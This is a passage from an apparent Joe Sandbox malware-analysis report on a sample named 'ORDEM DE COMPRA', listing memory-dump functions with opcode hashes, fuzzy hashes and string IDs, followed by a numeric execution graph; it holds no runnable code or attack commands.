                Function 00007FFD348AAA3D Relevance: .1, Instructions: 73COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b26e9f4d761a012d43fba44ff392ec832538a342aecd5fd20b38c5322c93e22
                • Instruction ID: 2e347fabdf7d6be7fc03e5dad820b32d92e6f54aaf9440a3abb0aca83c29b307
                • Opcode Fuzzy Hash: 6b26e9f4d761a012d43fba44ff392ec832538a342aecd5fd20b38c5322c93e22
                • Instruction Fuzzy Hash: 11110221B0E98A0FE7D5E72C94B06A637E2EFEA34070941BAD40CC7686DD6CEC425390
                Function 00007FFD348ABC55 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc269cb4231dbdb047b5261ab35e1976e77d07babc6fc71af0e949a4403e761a
                • Instruction ID: 196228e27f3f80b949be511ea26ff005705539aac7311e1bc516c9dc61aff728
                • Opcode Fuzzy Hash: fc269cb4231dbdb047b5261ab35e1976e77d07babc6fc71af0e949a4403e761a
                • Instruction Fuzzy Hash: EE11083255E7C84FD7625B3848A60D47FD0FF97210B0902EAC188CB093DA9C550AD791
                Function 00007FFD348A4DE8 Relevance: .1, Instructions: 67COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d9b5c0fca49e7aabd205e7443ec180e54bb378fa8cacb0b47b9d1133621a994
                • Instruction ID: a782cbb02d515bce0298a8efc41b1ff263f48cfd0940a0a269b9e4fa822e4e82
                • Opcode Fuzzy Hash: 9d9b5c0fca49e7aabd205e7443ec180e54bb378fa8cacb0b47b9d1133621a994
                • Instruction Fuzzy Hash: 7511AC3071AA098FD7A9EB6C84E5A3273E2FF9A31571001BDD00EC7396DD29E842CB40
                Function 00007FFD348C5090 Relevance: .1, Instructions: 64COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ce3129969009aec996ed742fd101465e5922078f57d1e3a2edc1c5f9f54a92f
                • Instruction ID: 2433b0bbdde794a9fdcde8b052b2ba9c0847490ff05d615fc4fd589de4192b24
                • Opcode Fuzzy Hash: 0ce3129969009aec996ed742fd101465e5922078f57d1e3a2edc1c5f9f54a92f
                • Instruction Fuzzy Hash: C3110C31A09A1A5FEF94EB14D4985B2B3D5EB5A365B00013FC149C3691DA29FC82C750
                Function 00007FFD348A2755 Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f99d2d87291a43f73b1c93c2e25e26904bdb3036521fe6460de112e030394408
                • Instruction ID: 906543ee4a0d466c41a0f6a15945e5e0e3afefdf8c29bc8d3ec08c17ced4e8df
                • Opcode Fuzzy Hash: f99d2d87291a43f73b1c93c2e25e26904bdb3036521fe6460de112e030394408
                • Instruction Fuzzy Hash: E7118221B199094EEBD5EB6C94A53FCB6A2EF89311F04027AD40EC32C6CE6898055350
                Function 00007FFD348A0790 Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51870c2c899e893b53ab9b7a2888d08191fe051c5e68bbb30db7444450240e6e
                • Instruction ID: c684ae39d0c058f74d9d8cda405bad7edc450249d39b787f7bf8f4178b18abaf
                • Opcode Fuzzy Hash: 51870c2c899e893b53ab9b7a2888d08191fe051c5e68bbb30db7444450240e6e
                • Instruction Fuzzy Hash: 8401D671E0A91D4FD7E9AB3C845C2B976E1FF9A351F40057EE10ED3351DE6A58029350
                Function 00007FFD348A32BF Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df757d8ad45c1de4fb70eefa2f7e30b7520b2ccc5830f41d21ff5f6c0a257ace
                • Instruction ID: ec9e75cf348e81b7cd7bbc1cf65b0303bac3d98d75af6500f7b04ec0b44ce513
                • Opcode Fuzzy Hash: df757d8ad45c1de4fb70eefa2f7e30b7520b2ccc5830f41d21ff5f6c0a257ace
                • Instruction Fuzzy Hash: EB014E61B1EA890FD795EBAC54B61B93BE0EF5621030452F7D40DC71D7DE2898078382
                Function 00007FFD348AE1D7 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fa42531065f146964f992eba58ee0cd113bd3faf1318441e8559cf36dd84e29
                • Instruction ID: 234c21ece41a12239155ab11c24ccea9539601c7908cb2c74007cebceef04aa1
                • Opcode Fuzzy Hash: 1fa42531065f146964f992eba58ee0cd113bd3faf1318441e8559cf36dd84e29
                • Instruction Fuzzy Hash: 1F114C26A0E6D91FD792973898F10EA7BE0DF42314F0802FBC188CB1D3DD5C644A8761
                Function 00007FFD348A3345 Relevance: .1, Instructions: 55COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8bd0696db4c19ff0b221ee9d8e9dd6a27d623d5e6bdc341ecb6dd0b5fa8a4c7
                • Instruction ID: 1a92d9c9242280de40bc14f33fb13ca53cf4bba7587664cef49c2c7e93062a87
                • Opcode Fuzzy Hash: b8bd0696db4c19ff0b221ee9d8e9dd6a27d623d5e6bdc341ecb6dd0b5fa8a4c7
                • Instruction Fuzzy Hash: CD11A531E0EB894FDB968B6C68751ED3FB0AF47308F0900EBD548CA293DA689505C752
                Function 00007FFD348D6330 Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d9f304026a161c4f3d9eb6acb73bb8f68afe6b1905b218399bbd2edcd12ec5d
                • Instruction ID: 6a3750fdf976577d354426cbe9cb830bd2f6e464f0d535c9aefbfe329eb17bb4
                • Opcode Fuzzy Hash: 8d9f304026a161c4f3d9eb6acb73bb8f68afe6b1905b218399bbd2edcd12ec5d
                • Instruction Fuzzy Hash: 8DF0C221B0E91A0FEBA8D66DB4E46B436C1EF8B221B4501BBE54DCB295E81D9CC543C0
                Function 00007FFD348D94D0 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45d576d640c13088b52a88e09e38c6de5738099c398933b173fff47bfccdb2b0
                • Instruction ID: b7db385952e21edb446ad3d0627deda83777cc6add4944bc5073350c4a6fb804
                • Opcode Fuzzy Hash: 45d576d640c13088b52a88e09e38c6de5738099c398933b173fff47bfccdb2b0
                • Instruction Fuzzy Hash: 4F01AD60B0FA854FE79A976D48A82742BE1EFAB21835801FBD118CB2A3DC5C9C478751
                Function 00007FFD348AE1CF Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7fc921c35b51cd6b271be5ae78ae06de2282080e2b9fe634bf0351f1177bd789
                • Instruction ID: 05af6d00ee5a71a353280e0bfb1bfaeca40d0609d21259ecfa46e57645474af2
                • Opcode Fuzzy Hash: 7fc921c35b51cd6b271be5ae78ae06de2282080e2b9fe634bf0351f1177bd789
                • Instruction Fuzzy Hash: 96014961E0D58A1FE7A1973848B11F63BE0DF02314F0800B6D18CCB1C3EC6D24469761
                Function 00007FFD348C3350 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b2ffb596bf7261cbef4fdac2440d6d9e335e527461a5ea795d4cb769bca2e7e
                • Instruction ID: 0b6e12cbd4ff82d018bade8b116e57b3797d3345846d87ba2eaae8505a08277c
                • Opcode Fuzzy Hash: 4b2ffb596bf7261cbef4fdac2440d6d9e335e527461a5ea795d4cb769bca2e7e
                • Instruction Fuzzy Hash: BAF0FE30714C0E8F9AD4F72DE8A8A25B3E6FFD931175901A6E40DC7265DE64DC52C781
                Function 00007FFD348A9659 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 35e60ad449b023e5e0e1031eb01dc846e044942662bfb2ef38c15e283eef9d63
                • Instruction ID: 6ed79482bc51ff00a8ef169b24520c6d1ecb0fbcd811a8f1ce4227afbb203917
                • Opcode Fuzzy Hash: 35e60ad449b023e5e0e1031eb01dc846e044942662bfb2ef38c15e283eef9d63
                • Instruction Fuzzy Hash: 53F0813171CE064B977CAB98A4A14B6B3E0EF543207140A6ED05B83A87DE39F5468685
                Function 00007FFD348AAB09 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 42f29f67258c21be86e49da503c90bf318c35f57e6f4934d0ed20850fd050947
                • Instruction ID: bc877f3356d9650540a3d4478d16922980dd7b1ad03ca5bd10fc266438f19c51
                • Opcode Fuzzy Hash: 42f29f67258c21be86e49da503c90bf318c35f57e6f4934d0ed20850fd050947
                • Instruction Fuzzy Hash: 2B01AF30919BCD4FCB86EFB488281B97FB0FF5A200B0904EBE859D72A3DA785914C751
                Function 00007FFD348A544D Relevance: .0, Instructions: 40COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7343da6e666fe3a90d81819972356c0767681e9c4c159ceb3ba70b88146f44ea
                • Instruction ID: 0aff98cd8382bd5e9ff62ae0d84d5953b12ccdb03e2d809cc58f3e4f37dcc809
                • Opcode Fuzzy Hash: 7343da6e666fe3a90d81819972356c0767681e9c4c159ceb3ba70b88146f44ea
                • Instruction Fuzzy Hash: ECE0E502B1F81A03A29433EE24E91FA4B95DFDA235B5802B7E14CC3182DC9C58479290
                Function 00007FFD348A262B Relevance: .0, Instructions: 38COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1dc6aa0e4d083af44fa6155ce17f9faabb16739aa3e887fdaf8cf30250ae5318
                • Instruction ID: d26ade8b4b8c8c9dc143d215c3bc5cc0becc7e0e037ddee53f6ea137fa8a6259
                • Opcode Fuzzy Hash: 1dc6aa0e4d083af44fa6155ce17f9faabb16739aa3e887fdaf8cf30250ae5318
                • Instruction Fuzzy Hash: A9F02E26B0E8190FE6A8E72C94612F85382EF89354F5445BAD50EC36C7DD1D7C0743A0
                Function 00007FFD348ABB35 Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d667b3d15f4624cd588fa2f4c8a3b1eb1be90b2ef5f4a1bcb5fc11b8fe8bc67e
                • Instruction ID: 906674a096e48be88b9f9803a0a7d075e631bbb459fb643ea945a158796b96d4
                • Opcode Fuzzy Hash: d667b3d15f4624cd588fa2f4c8a3b1eb1be90b2ef5f4a1bcb5fc11b8fe8bc67e
                • Instruction Fuzzy Hash: 85E0DF3672E9194FEBA8B73C58510A2B390FF562503109ABBC08BD3441DE25F80A4380
                Function 00007FFD348A27DE Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13cad4f5623f208292cef2346a7d378c310182b25979e95361f1ae857dc3d997
                • Instruction ID: 8dfd99272e7e72756493d9f8b2552790148c51bdaa285e58a13e6b61afcb85e2
                • Opcode Fuzzy Hash: 13cad4f5623f208292cef2346a7d378c310182b25979e95361f1ae857dc3d997
                • Instruction Fuzzy Hash: 64E0267250FA8C5BCB10AA5A6C408863FA8FA8D32CF00012BF14CC3242E6159951C352
                Function 00007FFD348B6950 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cfea2db76c9ffce5dda89a31a788b44a792dc873663b1286c184fe41e23f25f
                • Instruction ID: 3f4532663545dd7bb83212ee8ecfde3249dccea7429c834cae3284d8de8dbb59
                • Opcode Fuzzy Hash: 3cfea2db76c9ffce5dda89a31a788b44a792dc873663b1286c184fe41e23f25f
                • Instruction Fuzzy Hash: 38D01220A28E194FDBB8BBB850553B561E0FF18310F400A6AD01AD3589DFBCBD8547C1
                Function 00007FFD348AD160 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe712d5021c77be63a9740c79be226b9e6996cf506a8ab0553347c30c9071987
                • Instruction ID: 3bcc0f599e0e01247f848dea59f8d3c70efcf7eb4b1b4cf2b02060a8d5675f94
                • Opcode Fuzzy Hash: fe712d5021c77be63a9740c79be226b9e6996cf506a8ab0553347c30c9071987
                • Instruction Fuzzy Hash: 43D05B81B1190917E748E73F0C9E76062C3E7D4604F8481719508C5295DCAC94424644
                Function 00007FFD348A2910 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4ac21f55b4909556f47eecf296a44c8fdb1cab386f888b77bb042c4ba5208b64
                • Instruction ID: f269d1fc9450a04bf56c1f937abe388953e480e3f52960183643609ab0454e9e
                • Opcode Fuzzy Hash: 4ac21f55b4909556f47eecf296a44c8fdb1cab386f888b77bb042c4ba5208b64
                • Instruction Fuzzy Hash: E4C02B1170CC0D4F63C0F25D68801A863C2D74C1703100133C80DC2240CC9C8C970380

                Non-executed Functions

                Function 00007FFD348A0518 Relevance: 9.0, Strings: 7, Instructions: 270COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7K>$N_^I$N_^T$N_^U$N_^\$N_^]${>N
                • API String ID: 0-1337463557
                • Opcode ID: 587a24b2aa5cf12836bf36ee61e64ff11b8031d1314705be82daf1fe0e7b62e8
                • Instruction ID: a0630f35aaf714ad378dc00220fb84d94e648bfdcee7932d00c85150331bdb2a
                • Opcode Fuzzy Hash: 587a24b2aa5cf12836bf36ee61e64ff11b8031d1314705be82daf1fe0e7b62e8
                • Instruction Fuzzy Hash: 22610327B085321BD7117AFDB9711EEB724DF813767085277D388DA083A978708A87E5
                Function 00007FFD348ACC00 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: uM_^
                • API String ID: 0-3021450313
                • Opcode ID: 5e3e1dcef849913dffea2005882f111af36cfa652999d12ffb68d12c25485c74
                • Instruction ID: 2642d7160d05c368f8d5cb2716ee4ce2386af780639713700f14a44ec2ff19c0
                • Opcode Fuzzy Hash: 5e3e1dcef849913dffea2005882f111af36cfa652999d12ffb68d12c25485c74
                • Instruction Fuzzy Hash: C602A516B0E5961BE761B7BCB4B10EA3BA0DF4232570C41B7D68CCB093ED6D744B92A1
                Function 00007FFD348D1358 Relevance: .4, Instructions: 439COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc7fa09688e9309d105d8b1000a10601a39ba53e9dfda96433da9dea0d8bc0d5
                • Instruction ID: bc39f27ff67c40833372974f9bf9e73bf495bf1f8ad111324fe297ee76a82dda
                • Opcode Fuzzy Hash: dc7fa09688e9309d105d8b1000a10601a39ba53e9dfda96433da9dea0d8bc0d5
                • Instruction Fuzzy Hash: 7CD19217A0F2A25BE76177BC78B10EA7B64DF43328B0C43B7D18C8A093ED6C74468295
                Function 00007FFD348D0F10 Relevance: .1, Instructions: 83COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c74255e6bc59cf5ff599dbdd63333110da0a7b9d9d34fc6aa16fcbcc46c50d83
                • Instruction ID: 2763ba3b40fdbf69b02fe8f5c02ada7968ce1fbc062469ad9d460065145a70d1
                • Opcode Fuzzy Hash: c74255e6bc59cf5ff599dbdd63333110da0a7b9d9d34fc6aa16fcbcc46c50d83
                • Instruction Fuzzy Hash: 04218E67A0C16226D621B6FC35751EB7B788F45338B0D5277D0CCAB043BD7830858695
                Function 00007FFD348A0465 Relevance: 7.8, Strings: 6, Instructions: 299COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: N_^I$N_^T$N_^U$N_^\$N_^]${>N
                • API String ID: 0-2908368460
                • Opcode ID: 6866fd159effb47f0fcfb553718b037658211d32b8e2fd1a5ad40c72f6f30700
                • Instruction ID: 4b00ed7c7b7de902ad53e8e8b60ecbdc2f8e3ffae92e62d1e80d32e6bbc7ec7a
                • Opcode Fuzzy Hash: 6866fd159effb47f0fcfb553718b037658211d32b8e2fd1a5ad40c72f6f30700
                • Instruction Fuzzy Hash: BE81D41770D5721BD71277FDB8715EABB24DF8237670852B7C388CA083A968748A83E5
                Function 00007FFD348A07E5 Relevance: 7.6, Strings: 6, Instructions: 125COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: [q$([q$0[q$8[q$@[q$Gy4
                • API String ID: 0-151287100
                • Opcode ID: fca2f415cc83ed342afdb3a447dcaa623adad3bd58de46ded9c1deb6138018d8
                • Instruction ID: 32bb42c7d14e3a1e97c5a1fc849d37e3b99bdceb3701a9203771579968f88168
                • Opcode Fuzzy Hash: fca2f415cc83ed342afdb3a447dcaa623adad3bd58de46ded9c1deb6138018d8
                • Instruction Fuzzy Hash: 30312C21B1E64A4FD3A9E7FC58B65A577D4EF4633074802BAD14DCB1E2EC6D68828360
                Function 00007FFD348A1A3A Relevance: 7.6, Strings: 6, Instructions: 111COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: [q$([q$0[q$8[q$@[q$Gy4
                • API String ID: 0-151287100
                • Opcode ID: 60e7ca612a476c79920955cd712f3932f8c7da660d4c74a9c3af43ba0e66812e
                • Instruction ID: 6ca1e2b2fd643e7bf31c4469f997b8b91cc0882fadc2d2fccaf402849705c405
                • Opcode Fuzzy Hash: 60e7ca612a476c79920955cd712f3932f8c7da660d4c74a9c3af43ba0e66812e
                • Instruction Fuzzy Hash: 9E31D431B1E6864FD39ED7BC98BA5647BD5EF4632034802FAD14DCB1A2E96DAC468310

                Execution Graph

                Execution Coverage:13.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:5.2%
                Total number of Nodes:230
                Total number of Limit Nodes:21
                execution_graph 40786 2f6d3d0 40787 2f6d3dc 40786->40787 40797 6a61de0 40787->40797 40805 6a61dd0 40787->40805 40788 2f6d497 40813 6a78a58 40788->40813 40818 6a78a48 40788->40818 40789 2f6d5b6 40790 2f6d611 40789->40790 40823 14f3a60 40789->40823 40827 14f3a5a 40789->40827 40799 6a61e02 40797->40799 40798 6a621e9 40798->40788 40799->40798 40831 6a68d94 40799->40831 40835 6a689b0 40799->40835 40800 6a61ece 40800->40798 40839 6a6bb70 40800->40839 40846 6a6bd0b 40800->40846 40807 6a61de0 40805->40807 40806 6a621e9 40806->40788 40807->40806 40811 6a68d94 LdrInitializeThunk 40807->40811 40812 6a689b0 LdrInitializeThunk 40807->40812 40808 6a61ece 40808->40806 40809 6a6bb70 4 API calls 40808->40809 40810 6a6bd0b 4 API calls 40808->40810 40809->40808 40810->40808 40811->40808 40812->40808 40814 6a78a7a 40813->40814 40815 6a78b8c 40814->40815 40816 6a68d94 LdrInitializeThunk 40814->40816 40817 6a689b0 LdrInitializeThunk 40814->40817 40815->40789 40816->40815 40817->40815 40819 6a78a7a 40818->40819 40820 6a78b8c 40819->40820 40821 6a68d94 LdrInitializeThunk 40819->40821 40822 6a689b0 LdrInitializeThunk 40819->40822 40820->40789 40821->40820 40822->40820 40824 14f3a6f 40823->40824 40870 14f312c 40824->40870 40828 14f3a6f 40827->40828 40829 14f312c 7 API calls 40828->40829 40830 14f3a90 40829->40830 40830->40790 40833 6a68c4b 40831->40833 40832 6a68ed1 LdrInitializeThunk 40834 6a68ee9 40832->40834 40833->40832 40834->40800 40838 6a689e1 40835->40838 40836 6a68b41 40836->40800 40837 6a68ed1 LdrInitializeThunk 40837->40836 40838->40836 40838->40837 40840 6a6bb97 40839->40840 40841 6a6bcb3 40840->40841 40853 6a6bfc4 40840->40853 40858 6a6be18 40840->40858 40862 6a6be28 40840->40862 40866 6a6bf64 40840->40866 40841->40800 40847 6a6bbcf 40846->40847 40848 6a6bcb3 40847->40848 40849 6a6bfc4 LdrInitializeThunk 40847->40849 40850 6a6bf64 LdrInitializeThunk 40847->40850 40851 6a6be28 LdrInitializeThunk 40847->40851 40852 6a6be18 LdrInitializeThunk 40847->40852 40848->40800 40849->40848 40850->40848 40851->40848 40852->40848 40854 6a6bf43 40853->40854 40855 6a6bfc9 40853->40855 40856 6a6be79 LdrInitializeThunk 40854->40856 40857 6a6be86 40854->40857 40855->40841 40856->40857 40857->40841 40859 6a6be50 LdrInitializeThunk 40858->40859 40861 6a6be86 40859->40861 40861->40841 40863 6a6be50 LdrInitializeThunk 40862->40863 40865 6a6be86 40863->40865 40865->40841 40867 6a6bf43 40866->40867 40868 6a6be79 LdrInitializeThunk 40867->40868 40869 6a6be86 40867->40869 40868->40869 40869->40841 40871 14f3131 40870->40871 40874 14f4904 40871->40874 40873 14f5416 40875 14f490f 40874->40875 40876 14f5b3c 40875->40876 40879 14f77c8 40875->40879 40884 14f77a0 40875->40884 40876->40873 40880 14f77e9 40879->40880 40881 14f780d 40880->40881 40889 14f7969 40880->40889 40893 14f7978 40880->40893 40881->40876 40885 14f77c8 40884->40885 40886 14f780d 40885->40886 40887 14f7969 7 API calls 40885->40887 40888 14f7978 7 API calls 40885->40888 40886->40876 40887->40886 40888->40886 40890 